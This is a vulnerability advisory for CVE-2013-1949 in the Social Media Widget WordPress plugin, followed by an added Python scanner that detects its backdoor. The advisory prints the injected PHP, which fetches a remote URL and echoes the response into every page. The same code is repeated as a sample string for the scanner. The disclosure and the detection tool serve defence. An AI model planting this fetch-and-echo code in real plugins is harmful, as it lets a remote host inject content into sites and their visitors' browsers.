Social Media Widget remote file inclusion

2013.04.14
Credit: Kurt Seifried
Risk: High
Local: No
Remote: Yes
CWE: CWE-noinfo


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation

So the company responsible for Social Media Widget claims that a rogue developer they contracted inserted this code:

    $smw_url = "hxxp://i.aaur.net/i.php";
    if(!function_exists("smw_get")){
        function smw_get($f) {
            // First attempt: fetch the remote URL through the WordPress HTTP API.
            $response = wp_remote_get( $f );
            if( is_wp_error( $response ) ) {
                // Fallback: raw cURL with every error suppressed by @.
                function smw_get_body($f) {
                    $ch = @curl_init();
                    @curl_setopt($ch, CURLOPT_URL, $f);
                    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                    $output = @curl_exec($ch);
                    @curl_close($ch);
                    return $output;
                }
                echo smw_get_body($f);
            } else {
                // Whatever the remote host returns is written straight into the generated page.
                echo $response["body"];
            }
        }
        smw_get($smw_url);
    }

Regardless of HOW this code got into the plugin it represents a significant security issue. Any site using this plugin is pulling "hxxp://i.aaur.net/i.php" and including it in the page they generate and send to a user. This opens up a huge can of worms: anyone that can man-in-the-middle your server can now inject PHP into your blog, or anything sent to the clients/etc. Please use CVE-2013-1949 for this issue.
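An added example, not part of the advisory and not the plugin's own code: a small static scanner that flags the fetch-and-echo pattern shown above in PHP source. It reports the two indicators quoted in the advisory (the hostname i.aaur.net and the helper name smw_get), hard-coded remote URLs, remote fetch calls, and, with a simple taint pass, any echo/print whose operand is a variable or function that carries a fetched response body. The regexes and the two sample inputs (the quoted snippet and a constructed clean widget) are my own assumptions for illustration; the heuristic is meant to triage a plugin tree, not to replace a manual review.

```python
"""Heuristic scanner for remote fetch-and-echo backdoors in WordPress plugin PHP."""
import re
from typing import List, Set, Tuple

# Constructed sample 1: the injected snippet as quoted in the advisory (hxxp kept
# defanged, exactly as quoted). Line numbers below count from the <?php line.
SAMPLE_BACKDOOR = r'''<?php
$smw_url = "hxxp://i.aaur.net/i.php";
if(!function_exists("smw_get")){
function smw_get($f) {
$response = wp_remote_get( $f );
if( is_wp_error( $response ) ) {
function smw_get_body($f) {
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, $f);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = @curl_exec($ch);
@curl_close($ch);
return $output;
}
echo smw_get_body($f);
} else {
echo $response["body"];
}
}
smw_get($smw_url);
}
'''

# Constructed sample 2: a harmless widget helper that also echoes a function result.
SAMPLE_CLEAN = r'''<?php
function smw_widget_title() {
    return esc_html( get_bloginfo( 'name' ) );
}
echo smw_widget_title();
'''

# Indicators taken from the advisory text. Everything else is a generic heuristic.
KNOWN_IOCS = ("i.aaur.net", "smw_get")

REMOTE_URL = re.compile(r"""["'](?:hxxps?|https?)://[^"']+["']""")
FETCH_CALL = re.compile(r"\b(wp_remote_get|curl_exec|file_get_contents)\s*\(")
ASSIGN_FETCH = re.compile(r"\$(\w+)\s*=\s*@?(?:wp_remote_get|curl_exec|file_get_contents)\s*\(")
FUNC_DEF = re.compile(r"\bfunction\s+(\w+)\s*\(")
RETURN_VAR = re.compile(r"\breturn\s+\$(\w+)\s*;")
OUTPUT_STMT = re.compile(r"\b(?:echo|print)\b(.*)")

Finding = Tuple[int, str, str]  # (line number, kind, evidence)


def scan_php(source: str) -> List[Finding]:
    """Return findings for one PHP file. Taint tracking is line-based and
    deliberately crude: a variable assigned from a fetch call is tainted, and a
    function whose most recent definition returns a tainted variable is tainted."""
    findings: List[Finding] = []
    lines = source.splitlines()
    tainted_vars: Set[str] = set()
    tainted_funcs: Set[str] = set()
    current_func = None

    # Pass 1: indicators, fetch sites, taint propagation.
    for no, line in enumerate(lines, 1):
        for ioc in KNOWN_IOCS:
            if ioc in line:
                findings.append((no, "ioc", ioc))
        m = REMOTE_URL.search(line)
        if m:
            findings.append((no, "hardcoded-remote-url", m.group(0)))
        m = FETCH_CALL.search(line)
        if m:
            findings.append((no, "remote-fetch", m.group(1)))
        m = ASSIGN_FETCH.search(line)
        if m:
            tainted_vars.add(m.group(1))
        m = FUNC_DEF.search(line)
        if m:
            current_func = m.group(1)
        m = RETURN_VAR.search(line)
        if m and current_func and m.group(1) in tainted_vars:
            tainted_funcs.add(current_func)

    # Pass 2: output statements that emit fetched content verbatim.
    for no, line in enumerate(lines, 1):
        m = OUTPUT_STMT.search(line)
        if not m:
            continue
        operand = m.group(1)
        for var in tainted_vars:
            if "$" + var in operand:
                findings.append((no, "fetch-and-echo", "$" + var))
        for fn in tainted_funcs:
            if re.search(r"\b" + re.escape(fn) + r"\s*\(", operand):
                findings.append((no, "fetch-and-echo", fn + "()"))
    return findings


def fetch_and_echo_lines(source: str) -> List[int]:
    """Line numbers where fetched remote content is written into the page."""
    return sorted({no for no, kind, _ in scan_php(source) if kind == "fetch-and-echo"})


def has_ioc(source: str) -> bool:
    return any(kind == "ioc" for _, kind, _ in scan_php(source))


if __name__ == "__main__":
    for name, src in (("backdoor", SAMPLE_BACKDOOR), ("clean", SAMPLE_CLEAN)):
        print(f"== {name}: fetch-and-echo at lines {fetch_and_echo_lines(src)}")
        for no, kind, evidence in scan_php(src):
            print(f"  L{no:<3} {kind:<22} {evidence}")
```

On the quoted snippet the scanner flags both output sites (the cURL fallback and the wp_remote_get branch) as fetch-and-echo, plus the hard-coded URL and the IOC strings; the clean sample produces no findings even though it also echoes a function result, because nothing in it is sourced from a remote fetch. To use it on a real install, read each .php file under wp-content/plugins and call scan_php on its contents.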

References:

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation



Copyright 2024, cxsecurity.com
